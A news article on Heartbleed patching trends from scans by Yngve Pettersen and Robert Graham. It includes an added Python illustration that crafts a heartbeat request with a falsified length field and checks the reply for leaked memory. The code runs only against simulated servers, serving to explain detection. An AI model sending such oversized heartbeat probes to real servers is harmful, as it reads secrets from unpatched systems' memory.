Security researcher and Opera developer Yngve Nysaeter Pettersen released a blog post Wednesday discussing an unintended consequence of the rush to patch the Heartbleed vulnerability. Rather than best practices and critical thinking prevailing, some administrators appear to have upgraded previously unaffected servers to OpenSSL versions that were themselves still vulnerable.
Pettersen said, “It is difficult to definitely say why this problem developed, but one possibility is that all the media attention led concerned system administrators into believing their system was insecure. This, perhaps combined with administrative pressure and a need to ‘do something’, led them to upgrade an unaffected server to a newer, but still buggy version of the system, perhaps because the system variant had not yet been officially patched.”
A few weeks ago the Heartbleed vulnerability was disclosed: a bug in OpenSSL's implementation of the TLS heartbeat extension that allows sensitive information, such as private keys and passwords, to be read out of the memory of supposedly secure servers. A flurry of activity and media attention followed.
Using his Transport Layer Security (TLS) Prober tool, Pettersen has scanned about 500,000 servers for the bug.
“In the six scans I have made since April 11, the number of vulnerable servers has trended sharply downward, from 5.36 percent of all servers, to 2.33 percent this week. About 20 percent of the scanned servers support the Heartbeat TLS Extension, indicating that up to 75 percent of the affected servers had been patched before my first scan 4 days after the disclosure,” Pettersen said in a blog post.
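The two checks behind figures like these are worth seeing concretely: a scanner first looks at whether the server advertises the heartbeat extension in its ServerHello (the "20 percent" above), and only then sends a heartbeat request whose length field claims more bytes than were actually sent, watching whether the reply contains more than it should. The following is an added, self-contained illustration of both checks in Python; it is not Pettersen's TLS Prober code. It assumes the TLS handshake has already been captured, so the ServerHello bytes are constructed in-line, and two hypothetical responder functions stand in for an unpatched and a patched server instead of a live connection.

```python
import struct

# TLS constants (RFC 5246 / RFC 6520)
TLS_HANDSHAKE = 0x16
TLS_HEARTBEAT = 0x18          # content type of heartbeat records
HS_SERVER_HELLO = 0x02
HEARTBEAT_EXT_TYPE = 0x000F   # extension type "heartbeat"
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_VERSION = 0x0302          # TLS 1.1, as a scanner might offer
PADDING = b"\x00" * 16        # RFC 6520 requires at least 16 bytes of padding


def make_server_hello(extensions: dict) -> bytes:
    """Build a minimal ServerHello record (constructed sample input, not a capture)."""
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions.items())
    hs = struct.pack("!H", TLS_VERSION) + b"\x11" * 32   # version + 32-byte random
    hs += b"\x00"                                        # empty session id
    hs += struct.pack("!H", 0x002F) + b"\x00"            # cipher suite, null compression
    if extensions:
        hs += struct.pack("!H", len(ext_bytes)) + ext_bytes
    body = bytes([HS_SERVER_HELLO]) + len(hs).to_bytes(3, "big") + hs
    return struct.pack("!BHH", TLS_HANDSHAKE, TLS_VERSION, len(body)) + body


def server_hello_extensions(record: bytes) -> dict:
    """Parse a ServerHello record and return {extension_type: extension_data}."""
    ctype, _ver, rlen = struct.unpack("!BHH", record[:5])
    body = record[5:5 + rlen]
    if ctype != TLS_HANDSHAKE or body[0] != HS_SERVER_HELLO:
        raise ValueError("not a ServerHello record")
    hs = body[4:4 + int.from_bytes(body[1:4], "big")]
    pos = 2 + 32                        # skip version and random
    pos += 1 + hs[pos]                  # skip session id
    pos += 2 + 1                        # skip cipher suite and compression method
    exts = {}
    if pos >= len(hs):                  # no extensions block at all
        return exts
    end = pos + 2 + struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= end:
        etype, elen = struct.unpack("!HH", hs[pos:pos + 4])
        exts[etype] = hs[pos + 4:pos + 4 + elen]
        pos += 4 + elen
    return exts


def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """Heartbeat request whose length field may lie about the payload size."""
    body = bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, TLS_VERSION, len(body)) + body


def heartbeat_leak(request: bytes, response: bytes) -> bytes:
    """Bytes echoed back beyond the payload we actually sent (empty if none)."""
    sent = len(request) - 5 - 3 - len(PADDING)
    if len(response) < 5:
        return b""
    ctype, _ver, rlen = struct.unpack("!BHH", response[:5])
    body = response[5:5 + rlen]
    if ctype != TLS_HEARTBEAT or not body or body[0] != HB_RESPONSE:
        return b""
    return body[3:len(body) - len(PADDING)][sent:]


def vulnerable_responder(request: bytes, process_memory: bytes) -> bytes:
    """Hypothetical stand-in for unpatched OpenSSL: trusts payload_length and copies
    that many bytes starting at the payload, running on into adjacent heap memory."""
    body = request[5:]
    claimed = struct.unpack("!H", body[1:3])[0]
    heap = body[3:] + process_memory     # what sits after the request in memory
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", claimed) + heap[:claimed] + PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, TLS_VERSION, len(resp)) + resp


def patched_responder(request: bytes, process_memory: bytes) -> bytes:
    """Hypothetical stand-in for a fixed server: a request whose claimed length
    does not fit inside the record is silently discarded."""
    body = request[5:]
    claimed = struct.unpack("!H", body[1:3])[0]
    if 1 + 2 + claimed + len(PADDING) > len(body):
        return b""
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", claimed) + body[3:3 + claimed] + PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, TLS_VERSION, len(resp)) + resp


def scan_host(server_hello: bytes, responder, process_memory: bytes = b"") -> str:
    """Classify a host the way the scans above do: does it advertise heartbeat,
    and if so, does it leak? The responder stands in for the live connection."""
    if HEARTBEAT_EXT_TYPE not in server_hello_extensions(server_hello):
        return "no-heartbeat"
    req = build_heartbeat_request(b"ping", 0x4000)   # claim 16 KiB, send 4 bytes
    return "vulnerable" if heartbeat_leak(req, responder(req, process_memory)) else "not-vulnerable"


if __name__ == "__main__":
    hello = make_server_hello({HEARTBEAT_EXT_TYPE: b"\x01"})   # 1 = peer_allowed_to_send
    memory = b"...Cookie: session=ZGVhZGJlZWY=; user=alice..."   # constructed heap contents
    print(scan_host(hello, vulnerable_responder, memory))       # vulnerable
    print(scan_host(hello, patched_responder, memory))          # not-vulnerable
    print(scan_host(make_server_hello({}), patched_responder))  # no-heartbeat
```

Note that "supports heartbeat" and "vulnerable" are distinct outcomes here, which is exactly why the 20 percent and the 2.33 percent in the quote differ: a server that advertises the extension but discards the oversized request is counted as patched, and a server that never advertises it cannot be tested this way at all.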
Another security researcher, Robert Graham of Errata Security, had similar findings. He estimates there were 318,239 Heartbleed vulnerable systems, down from 600,000 a month ago.
“However, while the vulnerability number had been halved, to 2.77 percent, after 2 weeks, in the most recent scan, 2 weeks later, the number has only been reduced to 2.33 percent, indicating that patching of vulnerable servers has almost completely stopped,” Pettersen said.
While this may indicate that most sites have been patched, patching alone does not undo a key that may already have been stolen; the certificate has to be replaced as well. Only 30 percent of the vulnerable sites use a certificate issued by a Certificate Authority recognized by browsers, and Pettersen estimates that most certificates have not been replaced even where the server was patched: “In fact, assuming that all servers supporting heartbeat in the first scan were vulnerable, then 2/3 of the certificates have not been replaced after patching the vulnerable servers (as the certificates of the patched servers have been observed in previous scans).”
His recommendation is to “get the servers patched, certificates updated and revoked, passwords changed (in that sequence).”